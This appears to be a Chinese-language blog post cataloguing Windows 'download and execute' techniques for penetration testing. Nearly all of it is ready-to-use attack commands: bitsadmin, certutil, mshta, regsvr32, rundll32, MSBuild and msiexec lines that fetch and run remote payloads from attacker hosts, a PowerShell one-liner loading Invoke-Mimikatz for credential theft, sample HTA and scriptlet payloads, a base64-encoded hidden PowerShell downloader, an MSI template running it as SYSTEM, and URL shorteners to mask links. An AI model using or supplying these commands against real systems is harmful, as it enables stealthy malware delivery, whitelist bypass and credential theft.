zoukankan      html  css  js  c++  java

  • windows下载执行命令大全

     

    1.bitsadmin命令(只能命令下载到指定路径上,win7以上):

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:abc.jpg"
    bitsadmin /transfer d90f http://site.com/a %APPDATA%d90f.exe&%APPDATA%d90f.exe&del %APPDATA%d90f.exe

    2.powershell命名下载执行:(win7以上)

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz


powershell -exec bypass -f \webdavserverfolderpayload.ps1


powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:111111111111111.exe’)


powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\1.jpg')

    3.mshta命令下载执行

    mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8

mshta \webdavserverfolderpayload.hta

    payload.hta

    <HTML>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<HEAD>

<script language="VBScript">

Window.ReSizeTo 0, 0

Window.moveTo -2000,-2000

Set objShell = CreateObject("Wscript.Shell")

objShell.Run "calc.exe"

self.close

</script>

<body>

demo

</body>

</HEAD>

</HTML>

    4.rundll32命令下载执行

    rundll32 \webdavserverfolderpayload.dll,entrypoint

rundll32.exe javascript:"..mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

    参考:https://github.com/3gstudent/Javascript-Backdoor

    5.net中的regasm命令下载执行

    C:WindowsMicrosoft.NETFramework64v4.0.30319
egasm.exe /u \webdavserverfolderpayload.dll

    6.cmd的远程命令下载:

    cmd.exe /k < \webdavserverfolderatchfile.txt

    7.regsvr32命令下载执行

    regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
    
regsvr32 /u /n /s /i:\webdavserverfolderpayload.sct scrobj.dll
    
regsvr32     /u /s /i:http://site.com/js.png scrobj.dll

    js.png

    <?XML version="1.0"?>

<scriptlet>

<registration

    progid="ShortJSRAT"

    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >

    <!-- Learn from Casey Smith @subTee -->

    <script language="JScript">

        <![CDATA[

            ps  = "cmd.exe /c calc.exe";

            new ActiveXObject("WScript.Shell").Run(ps,0,true);

 

        ]]>

</script>

</registration>

</scriptlet>

    8.certutil命令下载执行

    certutil -urlcache -split -f http://webserver/payload payload

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil /logfile= /LogToConsole=false /u payload.dll


certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe


certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

    9.net中的MSBulid命令下载执行

    cmd /V /c "set MB="C:WindowsMicrosoft.NETFramework64v4.0.30319MSBuild.exe" & !MB! /noautoresponse /preprocess \webdavserverfolderpayload.xml > payload.xml & !MB! payload.xml"

    10. odbcconf命令下载执行

    odbcconf /s /a {regsvr \webdavserverfolderpayload_dll.txt}

    11.cscript脚本远程命令下载执行

    cscript /b C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct

cscript //E:jscript \webdavserverfolderpayload.txt

    downfile.vbs:

    ' Set your settings

strFileURL = "http://www.it1.net/images/it1_logo2.jpg"

strHDLocation = "c:logo.jpg"

' Fetch the file

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then

Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

    将以上保存为downfile.vbs

    输入命令:cscript  downfile.vbs

    12.pubprn.vbs下载执行命令

    cscript /b C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1  script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

    13.windows自带命令copy

    copy \x.x.x.xxxpoc.exe

xcopy d:	est.exe  \x.x.x.x	est.exe

    14. IEXPLORE.EXE命令下载执行(需要IE存在oday)

    "C:Program FilesInternet ExplorerIEXPLORE.EXE" http://site.com/exp

    15.IEEXC命令下载执行

    C:WindowsMicrosoft.NETFrameworkv2.0.50727> caspol -s off
    

C:WindowsMicrosoft.NETFrameworkv2.    0.50727> IEExec http://site.com/files/test64.exe

    参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

    16. msiexec命令下载执行

    msiexec /q /i http://site.com/payloads/calc.png

    该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述

    首先将powershell实现下载执行的代码作base64编码:

    $fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:downloada.exe');start-process 'c:downloada.exe'"
$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes); 
$encoded

    得到:

    KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

    完整powershell命令为:

    powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

    完整wix文件为:

    <?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product 
Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" />
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">     
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1">
      <ComponentRef Id="ApplicationFiles"/>
    </Feature>
    <Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
    </Property>
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" 
ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
      invalid vbs to fail install
    </CustomAction>
    <InstallExecuteSequence>
      <Custom Action="SystemShell" After="InstallInitialize"></Custom>
      <Custom Action="FailInstall" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>

    将其编译,生成msi文件,命令如下:

    candle.exe msigen.wix

light.exe msigen.wixobj

    生成test.msi

    实现功能:

    msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi

    注:

    执行后需要手动结束进程msiexec.exe

    结合百度提供的短地址服务(http://dwz.cn/), 实现代码为34个字符,代码如下:

    msiexec /q /i http://dwz.cn/6UJpF8

    17.下载命令执行项目GreatSCT

    https://github.com/GreatSCT/
  • 相关阅读:
    [再寄小读者之数学篇](2014-06-19 满足三个积分等式的函数)
    [再寄小读者之数学篇](2014-06-19 微分等式的结论)
    我的一些武功
    TEX学习笔记
    我的一些诗词
    我的课程与学生
    [再寄小读者之数学篇](2014-06-19 三维插值公式)
    [再寄小读者之数学篇](2014-06-19 旋度公式)
    JAVA小项目实例源码—学习娱乐小助手
    可拖拽的3D盒子
  • 原文地址:https://www.cnblogs.com/backlion/p/7908563.html
Copyright © 2011-2022 走看看